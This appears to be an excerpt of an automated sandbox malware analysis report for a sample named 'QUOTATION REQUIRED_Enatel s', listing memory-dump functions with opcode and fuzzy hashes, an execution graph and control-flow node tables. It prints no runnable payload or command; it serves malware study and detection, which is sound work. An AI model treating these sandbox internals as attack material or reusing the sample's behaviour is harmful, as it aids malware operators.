                                                                                                                                              • Opcode ID: 405a59632052aa3705dc88e447b15f3811c2aabe7d0e9e7cdebad8996ae1a17a
                                                                                                                                              • Instruction ID: b8938f2f7017a5c0f9ff039bedcc4afbb7ac02f04533e37eef860c23080ed1d9
                                                                                                                                              • Opcode Fuzzy Hash: 405a59632052aa3705dc88e447b15f3811c2aabe7d0e9e7cdebad8996ae1a17a
                                                                                                                                              • Instruction Fuzzy Hash: 2FE13B74E102198FDB14DFA8D580AAEFBF2FF89304F248169D415AB359D730A942CFA1
                                                                                                                                              Function 06D0A0C0 Relevance: .3, Instructions: 312COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1636677987.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6d00000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 981ea7e6736286e969b5b2e82c3a617df9251f5438ebaaf1f40916097a5a1bd5
                                                                                                                                              • Instruction ID: 4a5c642b641fd4ce46bea62b4deb86f806f3b7075606175d59a92ddb7ba0acc8
                                                                                                                                              • Opcode Fuzzy Hash: 981ea7e6736286e969b5b2e82c3a617df9251f5438ebaaf1f40916097a5a1bd5
                                                                                                                                              • Instruction Fuzzy Hash: C2E1FA74E002198FDB14DFA9C584AAEFBF2FF89305F248169D419A735AD731A942CF60
                                                                                                                                              Function 06D08E20 Relevance: .3, Instructions: 312COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1636677987.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6d00000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: ec85a68cea99adf371cdfb501a6ef2c80361a8f36babda39aac81748b26e44c6
                                                                                                                                              • Instruction ID: 6fdeab2adf2e97d407eeced7ed7454ef79fed737a25dcbaad4234bfa2b143b9e
                                                                                                                                              • Opcode Fuzzy Hash: ec85a68cea99adf371cdfb501a6ef2c80361a8f36babda39aac81748b26e44c6
                                                                                                                                              • Instruction Fuzzy Hash: 3EE11A74E002198FDB14DFA9C590AAEFBF6FF89305F248169D415AB35AD730A942CF60
                                                                                                                                              Function 06D0AA70 Relevance: .3, Instructions: 312COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1636677987.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6d00000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 4bb9a3812fa1fa1a2dd06747118f07ee9a98c1666c0cc37bd3d79569e52aaddd
                                                                                                                                              • Instruction ID: 61d745b3562191ea5c023e43ff872297f0c9898536012421fb7562b84b0dadf3
                                                                                                                                              • Opcode Fuzzy Hash: 4bb9a3812fa1fa1a2dd06747118f07ee9a98c1666c0cc37bd3d79569e52aaddd
                                                                                                                                              • Instruction Fuzzy Hash: A9E1FA74E102198FDB14DF99C580AAEFBF2FF89305F248169D815AB356D731A942CFA0
                                                                                                                                              Function 06D089E8 Relevance: .3, Instructions: 312COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1636677987.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6d00000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 0c8aaff8dffb6de07ee5228c8c60a8d78fa621018d4e2f63310bcd2f3a704093
                                                                                                                                              • Instruction ID: 05c0bce1384db07f364c577016ccd39fe72608c52da3c05c02ca9c74e497f835
                                                                                                                                              • Opcode Fuzzy Hash: 0c8aaff8dffb6de07ee5228c8c60a8d78fa621018d4e2f63310bcd2f3a704093
                                                                                                                                              • Instruction Fuzzy Hash: 63E11A74E002198FDB14DFA9C580AAEFBF2FF89305F24816AD415A7359D731A942DFA0
                                                                                                                                              Function 04D3D5A1 Relevance: .3, Instructions: 267COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 6081cd65abd80dae20cde988d6fa837d5b9b7acccdaf137f23727ac18de80a32
                                                                                                                                              • Instruction ID: 9c0f33c649d6dae5d3c99580ece69d63591d1968b728b2bef047f2b20e44f13b
                                                                                                                                              • Opcode Fuzzy Hash: 6081cd65abd80dae20cde988d6fa837d5b9b7acccdaf137f23727ac18de80a32
                                                                                                                                              • Instruction Fuzzy Hash: 2CD1E831D2075A8ADB10EF64D990A99B7B1FFD5300F20DB9AE44937224EF70AAC5CB41
                                                                                                                                              Function 04D3D5B0 Relevance: .3, Instructions: 264COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9f5576947544c185dd12ff0facdd1e77be0ee6a264d83e597227b0f455286703
                                                                                                                                              • Instruction ID: 9318b5f8940b1a813c8e235b70a8dd6e74bd7134fecb1dce66c4c9b9a2674a0a
                                                                                                                                              • Opcode Fuzzy Hash: 9f5576947544c185dd12ff0facdd1e77be0ee6a264d83e597227b0f455286703
                                                                                                                                              • Instruction Fuzzy Hash: 50D1D831D2075A8ADB10EF64D994A99B7B1FFD5300F20DB9AE44937224EF70AAD4CB41
                                                                                                                                              Function 024DE0B4 Relevance: .3, Instructions: 264COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1631854951.00000000024D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_24d0000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: b0ccb4bae4864ad04bf59b0c3dba7a4abc3c07a8385172dbea2f3c079fda07ae
                                                                                                                                              • Instruction ID: 41d5336ef7cc0c3473a60a02e8766a54f2a9e70f54aeec1658d7b8880857a686
                                                                                                                                              • Opcode Fuzzy Hash: b0ccb4bae4864ad04bf59b0c3dba7a4abc3c07a8385172dbea2f3c079fda07ae
                                                                                                                                              • Instruction Fuzzy Hash: 0DA18C32F002198FCF19DFB5C85459EB7B2FF85304B25456AE806AB265DB71E946CF80
                                                                                                                                              Function 06D00B98 Relevance: .2, Instructions: 216COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1636677987.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6d00000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 980492a9505e0a008d8770da8503217ee9dc7d2633d0a659651382431fc53f22
                                                                                                                                              • Instruction ID: 86d5f815558765973ad3fb2e716522cfb86482a657eed744e9ab645c533ea278
                                                                                                                                              • Opcode Fuzzy Hash: 980492a9505e0a008d8770da8503217ee9dc7d2633d0a659651382431fc53f22
                                                                                                                                              • Instruction Fuzzy Hash: FF91F470D05219EFEBA4CFA9C884BEDBBB6BF49300F009169E459B7291DB345985CF60
                                                                                                                                              Function 0763F7B0 Relevance: .2, Instructions: 168COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1636874825.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7630000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9a70ab2e39b167f4d8dcdfc71243655ce5acde2cf40f9a8e8f17c6c20777ec39
                                                                                                                                              • Instruction ID: 2fb8db2aadaf1556cc4df8b155b1419e697ac48da2e51c75da96b2897d39e9ce
                                                                                                                                              • Opcode Fuzzy Hash: 9a70ab2e39b167f4d8dcdfc71243655ce5acde2cf40f9a8e8f17c6c20777ec39
                                                                                                                                              • Instruction Fuzzy Hash: D3611E70D102088FDB08EFBAE854A9ABBF7FBC8300F14D52AD5049B25AEF705906DB50
                                                                                                                                              Function 0763F7C0 Relevance: .2, Instructions: 159COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1636874825.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7630000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: bf9086b9fc4bfc2d559e322c92d011488fc74b32cfc0cdcb42ee206c17475c24
                                                                                                                                              • Instruction ID: 0635e446adb3182d3bb03f628c4b0fd0799a0ce32008c2d50cd3a850edb3e2e8
                                                                                                                                              • Opcode Fuzzy Hash: bf9086b9fc4bfc2d559e322c92d011488fc74b32cfc0cdcb42ee206c17475c24
                                                                                                                                              • Instruction Fuzzy Hash: 4D611E70D102088FEB48EFBAE854A9EBBF7FBC8300F14D12AD5059B25AEB705905DB50

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:10.7%
                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                              Signature Coverage:10.5%
                                                                                                                                              Total number of Nodes:38
                                                                                                                                              Total number of Limit Nodes:5
                                                                                                                                              execution_graph 19679 53fe018 19680 53fe024 19679->19680 19687 9dbddf1 19680->19687 19691 9dbde00 19680->19691 19681 53fe0e6 19695 9dbfc5b 19681->19695 19699 9dbfc68 19681->19699 19682 53fe61f 19688 9dbde22 19687->19688 19690 9dbdeec 19688->19690 19703 9db9548 19688->19703 19690->19681 19692 9dbde22 19691->19692 19693 9db9548 2 API calls 19692->19693 19694 9dbdeec 19692->19694 19693->19694 19694->19681 19696 9dbfc8a 19695->19696 19697 9db9548 2 API calls 19696->19697 19698 9dbfd3a 19696->19698 19697->19698 19698->19682 19700 9dbfc8a 19699->19700 19701 9db9548 2 API calls 19700->19701 19702 9dbfd3a 19700->19702 19701->19702 19702->19682 19708 9db9579 19703->19708 19704 9db96d9 19704->19690 19705 9db9924 LdrInitializeThunk 19705->19704 19708->19704 19708->19705 19709 9db9328 19708->19709 19710 9db933a 19709->19710 19712 9db933f 19709->19712 19710->19708 19711 9db9a69 LdrInitializeThunk 19711->19710 19712->19710 19712->19711 19713 9db992c 19718 9db97e3 19713->19718 19715 9db9924 LdrInitializeThunk 19716 9db9a81 19715->19716 19717 9db9328 LdrInitializeThunk 19717->19718 19718->19715 19718->19717 19719 9db9c70 19720 9db9c9d 19719->19720 19721 9db9328 LdrInitializeThunk 19720->19721 19722 9dbbb7f 19720->19722 19724 9db9fa6 19720->19724 19721->19724 19723 9db9328 LdrInitializeThunk 19723->19724 19724->19722 19724->19723

                                                                                                                                              Executed Functions

                                                                                                                                              Function 09DB9548 Relevance: 1.9, APIs: 1, Instructions: 357COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 972 9db9548-9db9577 973 9db9579 972->973 974 9db957e-9db9614 972->974 973->974 976 9db96b3-9db96b9 974->976 977 9db9619-9db962c 976->977 978 9db96bf-9db96d7 976->978 981 9db962e 977->981 982 9db9633-9db9684 977->982 979 9db96eb-9db96fe 978->979 980 9db96d9-9db96e6 978->980 984 9db9700 979->984 985 9db9705-9db9721 979->985 983 9db9a81-9db9b7e 980->983 981->982 998 9db9697-9db96a9 982->998 999 9db9686-9db9694 982->999 990 9db9b80-9db9b85 983->990 991 9db9b86-9db9b90 983->991 984->985 987 9db9728-9db974c 985->987 988 9db9723 985->988 995 9db974e 987->995 996 9db9753-9db9785 987->996 988->987 990->991 995->996 1004 9db978c-9db97ce 996->1004 1005 9db9787 996->1005 1001 9db96ab 998->1001 1002 9db96b0 998->1002 999->978 1001->1002 1002->976 1007 9db97d0 1004->1007 1008 9db97d5-9db97de 1004->1008 1005->1004 1007->1008 1009 9db9a06-9db9a0c 1008->1009 1010 9db97e3-9db9808 1009->1010 1011 9db9a12-9db9a25 1009->1011 1014 9db980a 1010->1014 1015 9db980f-9db9846 1010->1015 1012 9db9a2c-9db9a47 1011->1012 1013 9db9a27 1011->1013 1016 9db9a49 1012->1016 1017 9db9a4e-9db9a62 1012->1017 1013->1012 1014->1015 1023 9db9848 1015->1023 1024 9db984d-9db987f 1015->1024 1016->1017 1020 9db9a69-9db9a7f LdrInitializeThunk 1017->1020 1021 9db9a64 1017->1021 1020->983 1021->1020 1023->1024 1026 9db98e3-9db98f6 1024->1026 1027 9db9881-9db98a6 1024->1027 1030 9db98f8 1026->1030 1031 9db98fd-9db9922 1026->1031 1028 9db98a8 1027->1028 1029 9db98ad-9db98db 1027->1029 1028->1029 1029->1026 1030->1031 1034 9db9931-9db9969 1031->1034 1035 9db9924-9db9925 1031->1035 1036 9db996b 1034->1036 1037 9db9970-9db99d1 call 9db9328 1034->1037 1035->1011 1036->1037 1043 9db99d8-9db99fc 1037->1043 1044 9db99d3 1037->1044 1047 9db99fe 1043->1047 1048 9db9a03 1043->1048 1044->1043 1047->1048 1048->1009
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4070627740.0000000009DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_9db0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: d81b6c918174db80a4bca0434c67da8503cc254e6832a9ac9ed85015339081fc
                                                                                                                                              • Instruction ID: a6855dc6e65755380ef85d7d23c12f90cafcdb1745d37697552eedd6f33f25d3
                                                                                                                                              • Opcode Fuzzy Hash: d81b6c918174db80a4bca0434c67da8503cc254e6832a9ac9ed85015339081fc
                                                                                                                                              • Instruction Fuzzy Hash: 62F1E274E01258CFDB14DFA9C884B9DBBB2FF88304F5481A9E849AB355DB319986CF50
                                                                                                                                              Function 053F9DE0 Relevance: 1.1, Instructions: 1146COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 3de42ac6d437b2031ce2bf224966e5cf6763b623bde8031dcf174c6e7a351d70
                                                                                                                                              • Instruction ID: 655cf2b0b1521cdd47c6b69c08c4a615c941dbd84a72792c484b347a3a1cd93f
                                                                                                                                              • Opcode Fuzzy Hash: 3de42ac6d437b2031ce2bf224966e5cf6763b623bde8031dcf174c6e7a351d70
                                                                                                                                              • Instruction Fuzzy Hash: 90A2AE70A04209DFCB15CFA8C584AAEBBB6FF88310F15855AE50ADB361D775E845CBA0
                                                                                                                                              Function 053F69A0 Relevance: .5, Instructions: 515COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 37cb625366fa11e20d3ec5e7a25add0d32c98b8a844e5c57c1d8bc575ff6a497
                                                                                                                                              • Instruction ID: a09e48909663b8645c38678fac148e23980f32f559d7cd45e88541ea6e2d928d
                                                                                                                                              • Opcode Fuzzy Hash: 37cb625366fa11e20d3ec5e7a25add0d32c98b8a844e5c57c1d8bc575ff6a497
                                                                                                                                              • Instruction Fuzzy Hash: 8E128D70A002199FDB18DFA9C854BAEBBB6FF88700F208559E906DB391DF759D41CB90
                                                                                                                                              Function 053F6FC8 Relevance: .5, Instructions: 498COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 3205 53f6fc8-53f6ffe 3350 53f7000 call 53f7118 3205->3350 3351 53f7000 call 53f6fc8 3205->3351 3352 53f7000 call 53f69a0 3205->3352 3206 53f7006-53f700c 3207 53f700e-53f7012 3206->3207 3208 53f705c-53f7060 3206->3208 3211 53f7014-53f7019 3207->3211 3212 53f7021-53f7028 3207->3212 3209 53f7077-53f708b 3208->3209 3210 53f7062-53f7071 3208->3210 3347 53f708d call 53fa0e8 3209->3347 3348 53f708d call 53f9de0 3209->3348 3349 53f708d call 53f9dd0 3209->3349 3215 53f709d-53f70a7 3210->3215 3216 53f7073-53f7075 3210->3216 3211->3212 3213 53f70fe-53f713b 3212->3213 3214 53f702e-53f7035 3212->3214 3226 53f713d-53f7143 3213->3226 3227 53f7146-53f7166 3213->3227 3214->3208 3217 53f7037-53f703b 3214->3217 3219 53f70a9-53f70af 3215->3219 3220 53f70b1-53f70b5 3215->3220 3218 53f7093-53f709a 3216->3218 3224 53f703d-53f7042 3217->3224 3225 53f704a-53f7051 3217->3225 3222 53f70bd-53f70f7 3219->3222 3220->3222 3223 53f70b7 3220->3223 3222->3213 3223->3222 3224->3225 3225->3213 3228 53f7057-53f705a 3225->3228 3226->3227 3234 53f716d-53f7174 3227->3234 3235 53f7168 3227->3235 3228->3218 3236 53f7176-53f7181 3234->3236 3237 53f74fc-53f7505 3235->3237 3238 53f750d-53f7519 3236->3238 3239 53f7187-53f719a 3236->3239 3246 53f751b 3238->3246 3247 53f755a-53f7585 3238->3247 3244 53f719c-53f71aa 3239->3244 3245 53f71b0-53f71cb 3239->3245 3244->3245 3255 53f7484-53f748b 3244->3255 3253 53f71ef-53f71f2 3245->3253 3254 53f71cd-53f71d3 3245->3254 3246->3247 3251 53f758b-53f759a 3247->3251 3252 53f7587-53f7589 3247->3252 3270 53f759c-53f75ab 3251->3270 3271 53f75e4 3251->3271 3256 53f75e9-53f75eb 3252->3256 3260 53f734c-53f7352 3253->3260 3261 53f71f8-53f71fb 3253->3261 3257 53f71dc-53f71df 3254->3257 3258 53f71d5 3254->3258 3255->3237 3259 53f748d-53f748f 3255->3259 3264 53f7212-53f7218 3257->3264 3265 53f71e1-53f71e4 3257->3265 3258->3257 3258->3260 3263 53f743e-53f7441 3258->3263 3258->3264 3266 53f749e-53f74a4 3259->3266 3267 53f7491-53f7496 3259->3267 3260->3263 3268 53f7358-53f735d 3260->3268 3261->3260 3269 53f7201-53f7207 3261->3269 3276 53f7508 3263->3276 3277 53f7447-53f744d 3263->3277 3278 53f721e-53f7220 3264->3278 3279 53f721a-53f721c 3264->3279 3272 53f727e-53f7284 3265->3272 3273 53f71ea 3265->3273 3266->3238 3274 53f74a6-53f74ab 3266->3274 3267->3266 3268->3263 3269->3260 3275 53f720d 3269->3275 3270->3271 3295 53f75ad-53f75b3 3270->3295 3271->3256 3272->3263 3282 53f728a-53f7290 3272->3282 3273->3263 3280 53f74ad-53f74b2 3274->3280 3281 53f74f0-53f74f3 3274->3281 3275->3263 3276->3238 3283 53f744f-53f7457 3277->3283 3284 53f7472-53f7476 3277->3284 3285 53f722a-53f7233 3278->3285 3279->3285 3280->3276 3291 53f74b4 3280->3291 3281->3276 3289 53f74f5-53f74fa 3281->3289 3292 53f7296-53f7298 3282->3292 3293 53f7292-53f7294 3282->3293 3283->3238 3294 53f745d-53f746c 3283->3294 3284->3255 3288 53f7478-53f747e 3284->3288 3286 53f7246-53f726e 3285->3286 3287 53f7235-53f7240 3285->3287 3321 53f7274-53f7279 3286->3321 3322 53f7362-53f7398 3286->3322 3287->3263 3287->3286 3288->3236 3288->3255 3289->3237 3289->3259 3296 53f74bb-53f74c0 3291->3296 3297 53f72a2-53f72b9 3292->3297 3293->3297 3294->3245 3294->3284 3301 53f75b7-53f75c3 3295->3301 3302 53f75b5 3295->3302 3303 53f74e2-53f74e4 3296->3303 3304 53f74c2-53f74c4 3296->3304 3311 53f72bb-53f72d4 3297->3311 3312 53f72e4-53f730b 3297->3312 3307 53f75c5-53f75de 3301->3307 3302->3307 3303->3276 3306 53f74e6-53f74e9 3303->3306 3308 53f74c6-53f74cb 3304->3308 3309 53f74d3-53f74d9 3304->3309 3306->3281 3307->3271 3323 53f75e0-53f75e2 3307->3323 3308->3309 3309->3238 3310 53f74db-53f74e0 3309->3310 3310->3303 3315 53f74b6-53f74b9 3310->3315 3311->3322 3326 53f72da-53f72df 3311->3326 3312->3276 3328 53f7311-53f7314 3312->3328 3315->3276 3315->3296 3321->3322 3329 53f739a-53f739e 3322->3329 3330 53f73a5-53f73ad 3322->3330 3323->3256 3326->3322 3328->3276 3331 53f731a-53f7343 3328->3331 3332 53f73bd-53f73c1 3329->3332 3333 53f73a0-53f73a3 3329->3333 3330->3276 3334 53f73b3-53f73b8 3330->3334 3331->3322 3346 53f7345-53f734a 3331->3346 3336 53f73c3-53f73c9 3332->3336 3337 53f73e0-53f73e4 3332->3337 3333->3330 3333->3332 3334->3263 3336->3337 3338 53f73cb-53f73d3 3336->3338 3339 53f73ee-53f740d call 53f76f1 3337->3339 3340 53f73e6-53f73ec 3337->3340 3338->3276 3342 53f73d9-53f73de 3338->3342 3343 53f7413-53f7417 3339->3343 3340->3339 3340->3343 3342->3263 3343->3263 3344 53f7419-53f7435 3343->3344 3344->3263 3346->3322 3347->3218 3348->3218 3349->3218 3350->3206 3351->3206 3352->3206
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 5b49471373d763dab06f7919c71c3788bd3a64906ec34da3dc883c737c7d105c
                                                                                                                                              • Instruction ID: c4c04d6db6fa2a36cc0fffdb784c0616c44d9602b1d1ce7fb6401976c264282e
                                                                                                                                              • Opcode Fuzzy Hash: 5b49471373d763dab06f7919c71c3788bd3a64906ec34da3dc883c737c7d105c
                                                                                                                                              • Instruction Fuzzy Hash: 1B124D70A04219DFCB14CFA9D888AADBBB6FF48310F55806AE905EB361D775EC51CB90
                                                                                                                                              Function 053F29EC Relevance: .5, Instructions: 480COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 3354 53f29ec-53f29f6 3356 53f29f8-53f2a3b 3354->3356 3357 53f2981-53f2999 3354->3357 3362 53f2a5d-53f2aac 3356->3362 3363 53f2a3d-53f2a5c 3356->3363 3361 53f29a0-53f29c8 3357->3361 3368 53f2aae-53f2ab5 3362->3368 3369 53f2ac7-53f2acf 3362->3369 3370 53f2abe-53f2ac5 3368->3370 3371 53f2ab7-53f2abc 3368->3371 3372 53f2ad2-53f2ae6 3369->3372 3370->3372 3371->3372 3375 53f2afc-53f2b04 3372->3375 3376 53f2ae8-53f2aef 3372->3376 3379 53f2b06-53f2b0a 3375->3379 3377 53f2af5-53f2afa 3376->3377 3378 53f2af1-53f2af3 3376->3378 3377->3379 3378->3379 3381 53f2b0c-53f2b21 3379->3381 3382 53f2b6a-53f2b6d 3379->3382 3381->3382 3388 53f2b23-53f2b26 3381->3388 3383 53f2b6f-53f2b84 3382->3383 3384 53f2bb5-53f2bbb 3382->3384 3383->3384 3396 53f2b86-53f2b8a 3383->3396 3385 53f36b6 3384->3385 3386 53f2bc1-53f2bc3 3384->3386 3393 53f36bb-53f36f0 3385->3393 3386->3385 3389 53f2bc9-53f2bce 3386->3389 3391 53f2b28-53f2b2a 3388->3391 3392 53f2b45-53f2b63 call 53f02c8 3388->3392 3394 53f3664-53f3668 3389->3394 3395 53f2bd4 3389->3395 3391->3392 3399 53f2b2c-53f2b2f 3391->3399 3392->3382 3414 53f371f-53f372c 3393->3414 3415 53f36f2-53f3700 3393->3415 3401 53f366f-53f36b5 3394->3401 3402 53f366a-53f366d 3394->3402 3395->3394 3397 53f2b8c-53f2b90 3396->3397 3398 53f2b92-53f2bb0 call 53f02c8 3396->3398 3397->3384 3397->3398 3398->3384 3399->3382 3404 53f2b31-53f2b43 3399->3404 3402->3393 3402->3401 3404->3382 3404->3392 3416 53f372e-53f3874 3414->3416 3415->3416 3417 53f3702-53f371b 3415->3417 3418 53f38a6-53f38bc 3416->3418 3419 53f3876-53f3883 3416->3419 3417->3414 3421 53f38ee-53f38f4 3418->3421 3422 53f38be-53f38c4 3418->3422 3419->3418 3424 53f38f6-53f3908 3421->3424 3426 53f3928-53f3930 3421->3426 3422->3424 3425 53f38c6-53f38eb 3422->3425 3427 53f393a-53f393b 3424->3427 3428 53f390a-53f390c 3424->3428 3425->3421 3426->3427 3429 53f393e-53f3941 3427->3429 3428->3429 3430 53f390e-53f3910 3428->3430 3431 53f3942-53f39b3 3429->3431 3430->3431 3432 53f3912-53f391f 3430->3432 3432->3426
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 8bbe24d4131d7967c1957e5f756066ffff08170046d893d7e270029268c8f146
                                                                                                                                              • Instruction ID: 4bccf9a6a3a0b86b7632df965323a9499f38e80f945bdd1d97c508a9d76412c6
                                                                                                                                              • Opcode Fuzzy Hash: 8bbe24d4131d7967c1957e5f756066ffff08170046d893d7e270029268c8f146
                                                                                                                                              • Instruction Fuzzy Hash: 7DE1C03AD04A67C7CB26C778CCC779ABB71EB54242F98CE61D719DB341D622C8428B91
                                                                                                                                              Function 053F3E09 Relevance: .3, Instructions: 268COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
